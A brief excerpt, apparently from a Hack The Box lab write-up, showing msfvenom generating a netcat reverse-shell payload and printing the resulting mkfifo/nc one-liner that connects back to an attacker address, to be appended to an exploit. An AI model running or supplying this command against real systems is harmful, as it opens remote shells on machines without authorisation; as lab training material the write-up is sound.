msfvenom
┌──(kali㉿kali)-[~/archive/htb/labs/solidstate]
└─$ msfvenom -p cmd/unix/reverse_netcat LHOST=10.10.14.5 LPORT=9999
[-] no platform was selected, choosing msf::Module::Platform::Unix from the payload
[-] no arch selected, selecting arch: cmd from the payload
No encoder specified, outputting raw payload
payload size: 96 bytes
mkfifo /tmp/ahavpa; nc 10.10.14.5 9999 0</tmp/ahavpa | /bin/sh >/tmp/ahavpa 2>&1; rm /tmp/ahavpa
msfvenom generated a reverse shell command for the exploit This payload will be appended to the exploit